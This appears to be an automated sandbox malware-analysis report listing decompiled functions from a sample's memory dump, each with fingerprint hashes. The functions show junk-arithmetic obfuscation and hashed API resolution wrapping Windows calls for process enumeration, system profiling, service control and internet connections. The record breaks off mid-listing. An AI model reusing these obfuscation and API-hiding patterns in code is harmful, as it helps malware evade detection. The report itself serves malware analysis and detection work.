                                              C-Code - Quality: 75%
                                              			E00211C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E002207A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}









                                              0x00211c8f
                                              0x00211c9d
                                              0x00211ca0
                                              0x00211ca3
                                              0x00211ca6
                                              0x00211ca7
                                              0x00211cae
                                              0x00211cb5
                                              0x00211cbc
                                              0x00211cc3
                                              0x00211cd6
                                              0x00211cd9
                                              0x00211ce6
                                              0x00211cf3
                                              0x00211cf9

                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 00211CF3
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3332741929-0
                                              • Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                              • Instruction ID: db72b8ba53f870f5452a777bf1ab8c3a8d9102bfa74b6068e551b0070268bec7
                                              • Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                              • Instruction Fuzzy Hash: 37F08C71E00208BBFB04DFA8CD4A68EFBB6EF84704F208099E5006B291DBF55F148B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00215A52, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 42%
                                              			E00215A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E0021602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E002207A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}










                                              0x00215a5d
                                              0x00215a5f
                                              0x00215a60
                                              0x00215a63
                                              0x00215a66
                                              0x00215a69
                                              0x00215a6c
                                              0x00215a6f
                                              0x00215a70
                                              0x00215a71
                                              0x00215a72
                                              0x00215a77
                                              0x00215a86
                                              0x00215a91
                                              0x00215a99
                                              0x00215a9a
                                              0x00215aa1
                                              0x00215aa5
                                              0x00215aac
                                              0x00215ab0
                                              0x00215ab7
                                              0x00215abe
                                              0x00215ac5
                                              0x00215ad2
                                              0x00215ae1
                                              0x00215ae9

                                              APIs
                                              • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 00215AE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: InternetOpen
                                              • String ID: J5
                                              • API String ID: 2038078732-3088381744
                                              • Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                              • Instruction ID: 517d5946bd8d9e93b317ac873baac85b92294941a942e2a11d894bf2482ec1fa
                                              • Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                              • Instruction Fuzzy Hash: 95113C7290060CBFEB05DF98DD859DFBB79EF14358F104098FA0562120D3B64E659BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x0021295f
                                              0x00212964
                                              0x00212967
                                              0x0021296a
                                              0x0021296d
                                              0x0021296e
                                              0x0021296f
                                              0x00212977
                                              0x00212985
                                              0x0021298a
                                              0x00212992
                                              0x0021299a
                                              0x002129a2
                                              0x002129a9
                                              0x002129b0
                                              0x002129b7
                                              0x002129bb
                                              0x002129cf
                                              0x002129dc
                                              0x002129e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                              • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                              • Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                              • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x0021c6e1
                                              0x0021c6e6
                                              0x0021c6f0
                                              0x0021c6fc
                                              0x0021c703
                                              0x0021c706
                                              0x0021c70d
                                              0x0021c711
                                              0x0021c715
                                              0x0021c71c
                                              0x0021c723
                                              0x0021c72a
                                              0x0021c731
                                              0x0021c738
                                              0x0021c751
                                              0x0021c762
                                              0x0021c768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                              • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                              • Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                              • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0021F74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0021F74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E0021602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E002207A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}











                                              0x0021f757
                                              0x0021f765
                                              0x0021f76a
                                              0x0021f774
                                              0x0021f782
                                              0x0021f787
                                              0x0021f78f
                                              0x0021f793
                                              0x0021f79a
                                              0x0021f7ac
                                              0x0021f7af
                                              0x0021f7b6
                                              0x0021f7c3
                                              0x0021f7d1
                                              0x0021f7d7

                                              APIs
                                              • ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 0021F7D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AgentObtainStringUser
                                              • String ID: G
                                              • API String ID: 2681117516-4236931613
                                              • Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                              • Instruction ID: 0f786674abe8b1987a1530dc362158abe5063ad0ab3caa6281f6353e3803f3d3
                                              • Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                              • Instruction Fuzzy Hash: DB015771900208FBEB04DF94DD4AADEBFB5EF84310F208088F50866290E7B55B60DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002176F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E002176F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E002207A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}












                                              0x002176fe
                                              0x00217701
                                              0x00217703
                                              0x00217706
                                              0x00217707
                                              0x00217708
                                              0x0021770d
                                              0x00217714
                                              0x0021771d
                                              0x00217724
                                              0x00217730
                                              0x00217738
                                              0x00217740
                                              0x00217747
                                              0x0021774e
                                              0x00217755
                                              0x00217764
                                              0x00217767
                                              0x00217774
                                              0x00217780
                                              0x00217786

                                              APIs
                                              • Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 00217780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FirstProcess32
                                              • String ID: nS8U
                                              • API String ID: 2623510744-2564412997
                                              • Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                              • Instruction ID: ba5dfddb9bd464ab807dd692bf2e988a718ef520c1c1f4cbeae11df6f9bba76e
                                              • Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                              • Instruction Fuzzy Hash: 980165B5D01218FBEB04DFA4D90A9EEBFB5EF40314F208089E8186B251E7B55B249B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x00211006
                                              0x00211009
                                              0x0021100c
                                              0x00211011
                                              0x00211016
                                              0x0021101d
                                              0x00211026
                                              0x0021102d
                                              0x00211034
                                              0x0021103b
                                              0x00211047
                                              0x0021104f
                                              0x00211057
                                              0x0021105e
                                              0x00211065
                                              0x0021106c
                                              0x00211073
                                              0x00211077
                                              0x0021108b
                                              0x00211096
                                              0x0021109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                              • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                              • Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                              • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0021602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E0021602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E002207A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}












                                              0x00216033
                                              0x00216036
                                              0x00216038
                                              0x0021603b
                                              0x0021603c
                                              0x0021603d
                                              0x00216042
                                              0x00216049
                                              0x00216055
                                              0x0021605c
                                              0x00216063
                                              0x0021606a
                                              0x00216081
                                              0x00216084
                                              0x0021608b
                                              0x00216092
                                              0x00216099
                                              0x002160a6
                                              0x002160b2
                                              0x002160b8

                                              APIs
                                              • GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 002160B2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: /Fq
                                              • API String ID: 3545744682-1299280358
                                              • Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                              • Instruction ID: bd2c748020dbff8ba792457bc4c28fe06cf9d4bc51cfb3b10f5b7437f6f5bcea
                                              • Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                              • Instruction Fuzzy Hash: 990116B5C1121CBBDB04EFE4D94A9EEBFB4EF45314F108189E8086B252D3B54B649F92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0021595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E0021595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E002207A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}








                                              0x0021595d
                                              0x0021595e
                                              0x00215960
                                              0x00215963
                                              0x00215965
                                              0x00215968
                                              0x00215969
                                              0x0021596a
                                              0x0021596f
                                              0x00215979
                                              0x00215982
                                              0x00215989
                                              0x00215990
                                              0x00215997
                                              0x0021599e
                                              0x002159a2
                                              0x002159a9
                                              0x002159c2
                                              0x002159ce
                                              0x002159d4

                                              APIs
                                              • FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 002159CE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindNext
                                              • String ID: 4
                                              • API String ID: 2029273394-293933855
                                              • Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                              • Instruction ID: 2c8ce4754a0ffbe7908c498d895a762f3800d8526d013eab3729bfcb85719b25
                                              • Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                              • Instruction Fuzzy Hash: 8A014676D11218BBEB14DFA4D84A8DEBE78EF50354F108188E80867251E7B25F649BA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x00224f80
                                              0x00224f81
                                              0x00224f82
                                              0x00224f86
                                              0x00224f87
                                              0x00224f8c
                                              0x00224fa5
                                              0x00224fa8
                                              0x00224faf
                                              0x00224fb6
                                              0x00224fc7
                                              0x00224fca
                                              0x00224fd7
                                              0x00224fe2
                                              0x00224fe7

                                              APIs
                                              • CloseHandle.KERNEL32(003E66D8), ref: 00224FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                              • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                              • Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                              • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00227955, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E00227955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E0021602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E002207A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}










                                              0x0022795d
                                              0x00227962
                                              0x00227964
                                              0x00227965
                                              0x0022796b
                                              0x0022796c
                                              0x0022796f
                                              0x00227972
                                              0x00227975
                                              0x00227978
                                              0x00227979
                                              0x0022797c
                                              0x0022797f
                                              0x00227980
                                              0x00227984
                                              0x00227985
                                              0x0022798a
                                              0x00227994
                                              0x002279a0
                                              0x002279a3
                                              0x002279ba
                                              0x002279c1
                                              0x002279c4
                                              0x002279cb
                                              0x002279d2
                                              0x002279d6
                                              0x002279dd
                                              0x002279e4
                                              0x002279f1
                                              0x00227a07
                                              0x00227a0e

                                              APIs
                                              • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00227A07
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID:
                                              • API String ID: 3050416762-0
                                              • Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                              • Instruction ID: ea7c7530376dc6d48f3345e40505da4764050cb3d86cd0bc32e0472d079ed886
                                              • Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                              • Instruction Fuzzy Hash: C9212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566120D7719A60DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022375D, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E0022375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E0021602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E002207A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}












                                              0x00223764
                                              0x00223769
                                              0x0022376a
                                              0x0022376d
                                              0x0022376e
                                              0x00223771
                                              0x00223774
                                              0x00223775
                                              0x00223778
                                              0x0022377b
                                              0x0022377e
                                              0x00223781
                                              0x00223782
                                              0x00223784
                                              0x00223785
                                              0x0022378a
                                              0x00223794
                                              0x0022379d
                                              0x002237a0
                                              0x002237a3
